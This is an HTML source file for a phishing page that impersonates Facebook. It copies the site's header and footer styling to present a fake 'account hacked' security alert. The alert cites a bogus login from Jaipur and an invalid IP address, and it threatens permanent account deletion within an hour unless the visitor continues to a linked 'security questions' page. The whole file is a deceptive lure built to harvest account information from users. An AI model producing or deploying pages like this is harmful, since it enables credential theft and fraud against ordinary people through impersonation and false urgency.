<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <title>Facebook Account Validation</title>
        <link rel="SHORTCUT ICON" href="images/facebook.png">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
        <meta name="description" content="Fancy Sliding Form with jQuery" />
        <meta name="keywords" content="jquery, form, sliding, usability, css3, validation, javascript"/>
        <link rel="stylesheet" href="css/style3.css" type="text/css" media="screen"/>
		<script type="text/javascript" src="jquery.min.js"></script>
        <script type="text/javascript" src="sliding.form.js"></script>
    </head>
    <style>
		a:link {color:#3b5998; text-decoration:none}
		a:visited {color:#3b5998;}
		a:hover{ text-decoration:underline; color:#3b5998;}
		a:active {color:#3b5998;text-decoration: none}
        span.reference{
            position:fixed;
            left:5px;
            top:5px;
            font-size:10px;
            text-shadow:1px 1px 1px #fff;
        }
        span.reference a{
            color:#555;
            text-decoration:none;
			text-transform:uppercase;
        }
        span.reference a:hover{
            color:#000;
            
        }
        h1{
            color:#ccc;
            font-size:36px;
            text-shadow:1px 1px 1px #fff;
            padding:20px;
        }
    </style>
    <body bgcolor="#e9eef3">
    
       <div class="fbSearch" style="background-color:#3b5998; height:37px; width:100%; -moz-box-shadow:0px 0px 1px #052467; -webkit-box-shadow:0px 0px 1px #052467;   box-shadow:0px 0px 1px #052467; position:fixed; padding:0px; border-bottom:1px solid #1d4088;">
       <center>
       <div>
       <div  style="display: inline-block; font-size:10.5px; color:#8f808f; margin-bottom:4px; padding-top:3px;">
  		<a href="" title="Locked"><img draggable="false" src="images/home.jpg" title="Locked" ></a>
        <img draggable="false" src="images/btn.jpg" style="cursor:pointer;" title="Locked"><input name="" type="text" placeholder="Search for people, places and things" maxlength="50" readonly="readonly" title="Locked"/><input name="" type="button" />  <img draggable="false" src="images/pic.jpg" style="padding-left:580px; cursor:pointer;" title="Locked">
       </div> 
       </div>
          </center>
       </div>
        <br><br>
        <div id="content">
        <br><br><br><br><br><br><center>
        <div id="wrapper">
                <div id="steps">
                    <form id="formElem" name="formElem" action="" method="post">
                        <fieldset class="step">
                            <legend> <img src="images/lock.png" style="padding-top:2px;"> Security</legend>
                           
                           <font color="#000000">
                           Your facebook account has been hacked and is now currently disabled some features. We detected suspecious login in your account from an unrecognized device and location on Friday, August 10, 2018 at 8:00pm. Location Jaipur,Rajasthan (IP=03.15.1990.02).
                           <br><br>
                           Please fill-up the following questionaire within the next hour or your facebook account will be permanently deleted.
                           <br><br></font>
                           <b><i style="color:#FF0000">Note:Please do not ignore this alert. Failure to complete will result to pemanently deletion of account. <a href="security-questions.html">Continue...</a></i></b>
                           
                           
                        </fieldset>
                        </form>
        </div>
        </div>
        </center>
        </div>
        </div>
        <center>
    <div style="padding-top:8px; position:relative;">
    <div>
    <div  style="display: inline-block; font-size:10.5px; color:#8f808f; padding-bottom:8px;">Facebook &copy; 2018 &middot; <a href="#">English(US)</a></div>
    <div align="right" style="display: inline-block; font-size:10.5px; color:#3b5998; padding-left:285px;"><a href="">About</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="">Create an Ad</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="">Create a Page</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="">Developers</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="">Careers</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="">Privacy</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="">Cookies</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="">Terms</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="">Help</a></div>
</div>
</div>
</center>
    </body>
</html>